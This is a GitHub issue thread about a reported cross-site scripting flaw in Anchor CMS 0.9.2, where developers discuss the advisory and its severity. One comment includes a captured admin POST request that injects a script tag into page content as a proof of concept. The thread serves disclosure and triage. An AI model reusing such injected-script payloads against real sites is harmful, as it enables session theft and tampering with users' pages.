### ISSUE TITLE
 Anchor CMS 0.9.2 Cross Site Scripting

### ISSUE THREAD

**Issue by NinjaSentry** [anchorcms/anchor-cms#832]
Hi guys. I saw this passing through on twitter. 
https://twitter.com/phpadvisories/status/580809255193710593

--

Anchor CMS 0.9.2 Cross Site Scripting
http://cxsecurity.com/issue/WLB-2015030173

#Affected Vendor: http://anchorcms.com/
#Date: 23/03/2015
#Discovered by: JoeV
#Type of vulnerability: XSS
#Tested on: Windows 7
#Version: 0.9.2

#Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting attack.

--

**Comment by csengineer13** [comment]
Thanks for posting this!

Pretty solid source on how to protect against XSS:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

An article about XSS in general:
http://www.sitepoint.com/php-security-cross-site-scripting-attacks-xss/

I'm not familiar enough with the code base to tackle this, but if someone provides some "next steps", I would be happy to take a stab. Also, I believe others have talked about security patches that have been added in dev and 1.0, not sure what those are or if they cover this.

**Comment by bitterbit** [comment]
Correct me if i'm wrong but this will work only if the user is logged in as an admin. 
I would not mark it as critical...

![screen1](https://cloud.githubusercontent.com/assets/4591339/6887349/24b8c1da-d665-11e4-8e84-5a078f495b34.png)
got me this:
<pre> 
POST http://localhost/admin/pages/add HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 868
Pragma: no-cache
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://bitterb.it
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYrv0PbmE33X2HFBx
Referer: http://localhost/admin/pages/add
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,he;q=0.6
Cookie: anchorcms=nas8kO1gwoi8RjavKnXFHW87sHnyqUDE

------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="token"

6018ec07dce403b87a74fe761041d069
------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="title"

asd
------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="redirect"


------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="content"

<script> console.log(1)</script>
------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="name"

asd
------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="slug"

asd
------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="status"

published
------WebKitFormBoundaryYrv0PbmE33X2HFBx
Content-Disposition: form-data; name="parent"

0
------WebKitFormBoundaryYrv0PbmE33X2HFBx--
</pre>

**Comment by CSCG** [comment]
From what I see -- @bitterbit is correct and I'm not sure if the vector provided would work in any other use case. I'm gonna keep testing, but my personal outdated version as well as current / dev versions all seem to not have the vulnerability in public space.
